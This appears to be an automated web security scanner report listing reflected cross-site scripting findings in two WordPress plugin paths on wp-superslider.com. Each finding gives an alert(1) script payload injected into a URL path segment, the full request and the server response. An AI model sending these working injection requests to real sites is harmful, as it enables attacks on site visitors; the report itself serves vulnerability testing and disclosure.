HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:22:30 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.12 X-Pingback: http://wp-superslider.com/site/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: bb2_screener_=1296674550+173.193.214.243; path=/ Set-Cookie: wpgb_visit_last_php-default=1296674551; expires=Thu, 02-Feb-2012 19:22:31 GMT; path=/ Last-Modified: Wed, 02 Feb 2011 19:22:31 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53483
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e1d48"><script>alert(1)</script>dbdb56bcb58 was submitted in the REST URL parameter 7. This input was echoed as e1d48\"><script>alert(1)</script>dbdb56bcb58 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider-login/plugin-data/superslider/ssLogine1d48"><script>alert(1)</script>dbdb56bcb58/default/default_horizontal.css HTTP/1.1 Host: wp-superslider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:22:32 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.12 X-Pingback: http://wp-superslider.com/site/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: bb2_screener_=1296674552+173.193.214.243; path=/ Set-Cookie: wpgb_visit_last_php-default=1296674553; expires=Thu, 02-Feb-2012 19:22:33 GMT; path=/ Last-Modified: Wed, 02 Feb 2011 19:22:33 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53482
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 8 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload afe00"><script>alert(1)</script>5f54c2a8b93 was submitted in the REST URL parameter 8. This input was echoed as afe00\"><script>alert(1)</script>5f54c2a8b93 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider-login/plugin-data/superslider/ssLogin/defaultafe00"><script>alert(1)</script>5f54c2a8b93/default_horizontal.css HTTP/1.1 Host: wp-superslider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:22:34 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.12 X-Pingback: http://wp-superslider.com/site/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: bb2_screener_=1296674554+173.193.214.243; path=/ Set-Cookie: wpgb_visit_last_php-default=1296674555; expires=Thu, 02-Feb-2012 19:22:35 GMT; path=/ Last-Modified: Wed, 02 Feb 2011 19:22:35 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53482
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 9 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 87487"><script>alert(1)</script>39e89501d03 was submitted in the REST URL parameter 9. This input was echoed as 87487\"><script>alert(1)</script>39e89501d03 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider-login/plugin-data/superslider/ssLogin/default/default_horizontal.css87487"><script>alert(1)</script>39e89501d03 HTTP/1.1 Host: wp-superslider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:22:37 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.12 X-Pingback: http://wp-superslider.com/site/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: bb2_screener_=1296674557+173.193.214.243; path=/ Set-Cookie: wpgb_visit_last_php-default=1296674557; expires=Thu, 02-Feb-2012 19:22:37 GMT; path=/ Last-Modified: Wed, 02 Feb 2011 19:22:37 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53482
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ea79a"><script>alert(1)</script>9de5f2df942 was submitted in the REST URL parameter 1. This input was echoed as ea79a\"><script>alert(1)</script>9de5f2df942 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /siteea79a"><script>alert(1)</script>9de5f2df942/wp-content/plugins/superslider-menu/js/nav-follow-min.js HTTP/1.1 Host: wp-superslider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:22:40 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.12 X-Pingback: http://wp-superslider.com/site/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: bb2_screener_=1296674561+173.193.214.243; path=/ Set-Cookie: wpgb_visit_last_php-default=1296674561; expires=Thu, 02-Feb-2012 19:22:41 GMT; path=/ Last-Modified: Wed, 02 Feb 2011 19:22:41 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53353
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 63b7c"><script>alert(1)</script>2271b17551d was submitted in the REST URL parameter 2. This input was echoed as 63b7c\"><script>alert(1)</script>2271b17551d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content63b7c"><script>alert(1)</script>2271b17551d/plugins/superslider-menu/js/nav-follow-min.js HTTP/1.1 Host: wp-superslider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:22:42 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.12 X-Pingback: http://wp-superslider.com/site/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: bb2_screener_=1296674563+173.193.214.243; path=/ Set-Cookie: wpgb_visit_last_php-default=1296674563; expires=Thu, 02-Feb-2012 19:22:43 GMT; path=/ Last-Modified: Wed, 02 Feb 2011 19:22:43 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53353
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dfc9a"><script>alert(1)</script>550f85bc728 was submitted in the REST URL parameter 3. This input was echoed as dfc9a\"><script>alert(1)</script>550f85bc728 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/pluginsdfc9a"><script>alert(1)</script>550f85bc728/superslider-menu/js/nav-follow-min.js HTTP/1.1 Host: wp-superslider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:22:44 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.12 X-Pingback: http://wp-superslider.com/site/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: bb2_screener_=1296674564+173.193.214.243; path=/ Set-Cookie: wpgb_visit_last_php-default=1296674564; expires=Thu, 02-Feb-2012 19:22:44 GMT; path=/ Last-Modified: Wed, 02 Feb 2011 19:22:44 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53353
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eeafd"><script>alert(1)</script>0b49ecee366 was submitted in the REST URL parameter 4. This input was echoed as eeafd\"><script>alert(1)</script>0b49ecee366 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider-menueeafd"><script>alert(1)</script>0b49ecee366/js/nav-follow-min.js HTTP/1.1 Host: wp-superslider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:22:45 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.12 X-Pingback: http://wp-superslider.com/site/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: bb2_screener_=1296674566+173.193.214.243; path=/ Set-Cookie: wpgb_visit_last_php-default=1296674566; expires=Thu, 02-Feb-2012 19:22:46 GMT; path=/ Last-Modified: Wed, 02 Feb 2011 19:22:46 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53353
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload daaa3"><script>alert(1)</script>cfbe353e491 was submitted in the REST URL parameter 5. This input was echoed as daaa3\"><script>alert(1)</script>cfbe353e491 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider-menu/jsdaaa3"><script>alert(1)</script>cfbe353e491/nav-follow-min.js HTTP/1.1 Host: wp-superslider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:22:47 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.12 X-Pingback: http://wp-superslider.com/site/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: bb2_screener_=1296674568+173.193.214.243; path=/ Set-Cookie: wpgb_visit_last_php-default=1296674568; expires=Thu, 02-Feb-2012 19:22:48 GMT; path=/ Last-Modified: Wed, 02 Feb 2011 19:22:48 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53353
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1fcb6"><script>alert(1)</script>4b7a1a7b17f was submitted in the REST URL parameter 6. This input was echoed as 1fcb6\"><script>alert(1)</script>4b7a1a7b17f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider-menu/js/nav-follow-min.js1fcb6"><script>alert(1)</script>4b7a1a7b17f HTTP/1.1 Host: wp-superslider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:22:49 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.12 X-Pingback: http://wp-superslider.com/site/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: bb2_screener_=1296674569+173.193.214.243; path=/ Set-Cookie: wpgb_visit_last_php-default=1296674569; expires=Thu, 02-Feb-2012 19:22:49 GMT; path=/ Last-Modified: Wed, 02 Feb 2011 19:22:49 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53353
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d618f"><script>alert(1)</script>b5bbe65fee5 was submitted in the REST URL parameter 1. This input was echoed as d618f\"><script>alert(1)</script>b5bbe65fee5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sited618f"><script>alert(1)</script>b5bbe65fee5/wp-content/plugins/superslider-menu/js/superslider-menu-min.js HTTP/1.1 Host: wp-superslider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:22:40 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.12 X-Pingback: http://wp-superslider.com/site/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: bb2_screener_=1296674561+173.193.214.243; path=/ Set-Cookie: wpgb_visit_last_php-default=1296674561; expires=Thu, 02-Feb-2012 19:22:41 GMT; path=/ Last-Modified: Wed, 02 Feb 2011 19:22:41 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53371
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ed395"><script>alert(1)</script>4ecb0a29794 was submitted in the REST URL parameter 2. This input was echoed as ed395\"><script>alert(1)</script>4ecb0a29794 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-contented395"><script>alert(1)</script>4ecb0a29794/plugins/superslider-menu/js/superslider-menu-min.js HTTP/1.1 Host: wp-superslider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:22:42 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.12 X-Pingback: http://wp-superslider.com/site/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: bb2_screener_=1296674563+173.193.214.243; path=/ Set-Cookie: wpgb_visit_last_php-default=1296674563; expires=Thu, 02-Feb-2012 19:22:43 GMT; path=/ Last-Modified: Wed, 02 Feb 2011 19:22:43 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53371
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bf143"><script>alert(1)</script>7ab2e0b1bf was submitted in the REST URL parameter 3. This input was echoed as bf143\"><script>alert(1)</script>7ab2e0b1bf in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/pluginsbf143"><script>alert(1)</script>7ab2e0b1bf/superslider-menu/js/superslider-menu-min.js HTTP/1.1 Host: wp-superslider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:22:44 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.12 X-Pingback: http://wp-superslider.com/site/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: bb2_screener_=1296674565+173.193.214.243; path=/ Set-Cookie: wpgb_visit_last_php-default=1296674565; expires=Thu, 02-Feb-2012 19:22:45 GMT; path=/ Last-Modified: Wed, 02 Feb 2011 19:22:45 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53368
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b82fc"><script>alert(1)</script>dedd8e0a44b was submitted in the REST URL parameter 4. This input was echoed as b82fc\"><script>alert(1)</script>dedd8e0a44b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider-menub82fc"><script>alert(1)</script>dedd8e0a44b/js/superslider-menu-min.js HTTP/1.1 Host: wp-superslider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:22:47 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.12 X-Pingback: http://wp-superslider.com/site/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: bb2_screener_=1296674568+173.193.214.243; path=/ Set-Cookie: wpgb_visit_last_php-default=1296674568; expires=Thu, 02-Feb-2012 19:22:48 GMT; path=/ Last-Modified: Wed, 02 Feb 2011 19:22:48 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53371
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e75ce"><script>alert(1)</script>115e8e28446 was submitted in the REST URL parameter 5. This input was echoed as e75ce\"><script>alert(1)</script>115e8e28446 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider-menu/jse75ce"><script>alert(1)</script>115e8e28446/superslider-menu-min.js HTTP/1.1 Host: wp-superslider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:22:49 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.12 X-Pingback: http://wp-superslider.com/site/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: bb2_screener_=1296674569+173.193.214.243; path=/ Set-Cookie: wpgb_visit_last_php-default=1296674569; expires=Thu, 02-Feb-2012 19:22:49 GMT; path=/ Last-Modified: Wed, 02 Feb 2011 19:22:49 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53371
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ca307"><script>alert(1)</script>082b33d15a1 was submitted in the REST URL parameter 6. This input was echoed as ca307\"><script>alert(1)</script>082b33d15a1 in the application's response.
